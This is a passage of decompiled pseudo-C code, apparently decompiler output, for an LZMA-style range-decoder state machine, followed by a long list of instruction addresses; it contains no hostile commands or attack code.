								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}

0x00000000
0x00406942
0x00406942
0x00406946
0x004069fd
0x00406a00
0x00406a0c
0x004068ed
0x004068ed
0x004068f0
0x00406c62
0x00406c62
0x00406c65
0x00406c65
0x00406c6b
0x00406c71
0x00406c77
0x00406c91
0x00406c94
0x00406c9a
0x00406ca5
0x00406ca7
0x00406c79
0x00406c79
0x00406c88
0x00406c8c
0x00406c8c
0x00406cb1
0x00406cd8
0x00406cd8
0x00406cde
0x00406cde
0x00000000
0x00406cb3
0x00406cb3
0x00406cb7
0x00406e66
0x00000000
0x00406e66
0x00406cc3
0x00406cca
0x00406cd2
0x00406cd5
0x00000000
0x00406cd5
0x0040694c
0x00406950
0x00406e91
0x00406e91
0x00406e94
0x00406e98
0x00406e98
0x00406956
0x0040695c
0x0040695f
0x00406963
0x00406966
0x0040696a
0x00406e30
0x00406e7c
0x00406e84
0x00406e8b
0x00406e8d
0x00000000
0x00406e8d
0x00406970
0x00406973
0x00406979
0x0040697b
0x0040697b
0x0040697e
0x00406981
0x00406984
0x00406987
0x0040698a
0x0040698d
0x0040698e
0x00406990
0x00406990
0x00406990
0x00406993
0x00406996
0x00406999
0x0040699c
0x0040699c
0x0040699f
0x004069a1
0x004069a1
0x004069a4
0x004069a4
0x004069a4
0x0040647a
0x0040647a
0x00406483
0x00000000
0x00000000
0x00406489
0x00000000
0x00406494
0x00000000
0x00000000
0x0040649d
0x004064a0
0x004064a3
0x004064a7
0x00000000
0x00000000
0x004064ad
0x004064b0
0x004064b2
0x004064b3
0x004064b6
0x004064b8
0x004064b9
0x004064bb
0x004064be
0x004064c3
0x004064c8
0x004064d1
0x004064e4
0x004064e7
0x004064f3
0x0040651b
0x0040651d
0x0040652b
0x0040652b
0x0040652f
0x00000000
0x00000000
0x00000000
0x00000000
0x0040651f
0x0040651f
0x00406522
0x00406523
0x00406523
0x00000000
0x0040651f
0x004064f9
0x004064fe
0x004064fe
0x00406507
0x0040650f
0x00406512
0x00000000
0x00406518
0x00406518
0x00000000
0x00406518
0x00000000
0x00406535
0x00406535
0x00406539
0x00406de5
0x00000000
0x00406de5
0x00406542
0x00406552
0x00406555
0x00406558
0x00406558
0x00406558
0x0040655b
0x0040655f
0x00000000
0x00000000
0x00406561
0x00406567
0x00406591
0x00406597
0x0040659e
0x00000000
0x0040659e
0x0040656d
0x00406570
0x00406575
0x00406575
0x00406580
0x00406588
0x0040658b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004065d0
0x004065d6
0x004065d9
0x004065e6
0x004065ee
0x00000000
0x00000000
0x004065a5
0x004065a5
0x004065a9
0x00406df4
0x00000000
0x00406df4
0x004065b5
0x004065c0
0x004065c0
0x004065c0
0x004065c3
0x004065c6
0x004065c9
0x004065ce
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004065f6
0x004065f8
0x004065fb
0x0040666c
0x0040666f
0x00406672
0x00406679
0x00406683
0x00000000
0x00406683
0x004065fd
0x00406601
0x00406604
0x00406606
0x00406609
0x0040660c
0x0040660e
0x00406611
0x00406613
0x00406618
0x0040661b
0x0040661e
0x00406622
0x00406629
0x0040662c
0x00406633
0x00406637
0x0040663f
0x0040663f
0x0040663f
0x00406639
0x00406639
0x00406639
0x0040662e
0x0040662e
0x0040662e
0x00406643
0x00406646
0x00406664
0x00406666
0x00000000
0x00406648
0x00406648
0x0040664b
0x0040664e
0x00406651
0x00406653
0x00406653
0x00406653
0x00406656
0x00406659
0x0040665b
0x0040665c
0x0040665f
0x00000000
0x0040665f
0x00000000
0x00406895
0x00406899
0x004068b7
0x004068ba
0x004068c1
0x004068c4
0x004068c7
0x004068ca
0x004068cd
0x004068d0
0x004068d2
0x004068d9
0x004068da
0x004068dc
0x004068df
0x004068e2
0x004068e5
0x004068e5
0x004068ea
0x00000000
0x004068ea
0x0040689b
0x0040689e
0x004068a1
0x004068ab
0x00000000
0x00000000
0x004068ff
0x00406903
0x00406926
0x00406929
0x0040692c
0x00406936
0x00406905
0x00406905
0x00406908
0x0040690b
0x0040690e
0x0040691b
0x0040691e
0x0040691e
0x00000000
0x00000000
0x00000000
0x00000000
0x004069b3
0x004069b7
0x004069be
0x004069c1
0x004069c4
0x004069ce
0x00000000
0x004069ce
0x004069b9
0x00000000
0x00000000
0x004069da
0x004069de
0x004069e5
0x004069e8
0x004069eb
0x004069e0
0x004069e0
0x004069e0
0x004069ee
0x004069f1
0x004069f4
0x004069f4
0x004069f7
0x004069fa
0x00000000
0x00000000
0x00406a9a
0x00406a9a
0x00406a9e
0x00406e3c
0x00000000
0x00406e3c
0x00406aa4
0x00406aa7
0x00406aaa
0x00406aae
0x00406ab1
0x00406ab7
0x00406ab9
0x00406ab9
0x00406ab9
0x00406abc
0x00406abf
0x00000000
0x00000000
0x0040668f
0x0040668f
0x00406693
0x00406e00
0x00000000
0x00406e00
0x00406699
0x0040669c
0x0040669f
0x004066a3
0x004066a6
0x004066ac
0x004066ae
0x004066ae
0x004066ae
0x004066b1
0x004066b4
0x004066b4
0x004066b7
0x004066ba
0x00000000
0x00000000
0x004066c0
0x004066c6
0x00000000
0x00000000
0x004066cc
0x004066cc
0x004066d0
0x004066d3
0x004066d6
0x004066d9
0x004066dc
0x004066dd
0x004066e0
0x004066e2
0x004066e8
0x004066eb
0x004066ee
0x004066f1
0x004066f4
0x004066f7
0x004066fa
0x00406716
0x00406719
0x0040671c
0x0040671f
0x00406726
0x0040672a
0x0040672c
0x00406730
0x004066fc
0x004066fc
0x00406700
0x00406708
0x0040670d
0x0040670f
0x00406711
0x00406711
0x00406733
0x0040673a
0x0040673d
0x00000000
0x00406743
0x00000000
0x00406743
0x00000000
0x00406748
0x00406748
0x0040674c
0x00406e0c
0x00000000
0x00406e0c
0x00406752
0x00406755
0x00406758
0x0040675c
0x0040675f
0x00406765
0x00406767
0x00406767
0x00406767
0x0040676a
0x0040676d
0x0040676d
0x0040676d
0x00406773
0x00000000
0x00000000
0x00406775
0x00406778
0x0040677b
0x0040677e
0x00406781
0x00406784
0x00406787
0x0040678a
0x0040678d
0x00406790
0x00406793
0x004067ab
0x004067ae
0x004067b1
0x004067b4
0x004067b4
0x004067b7
0x004067bb
0x004067bd
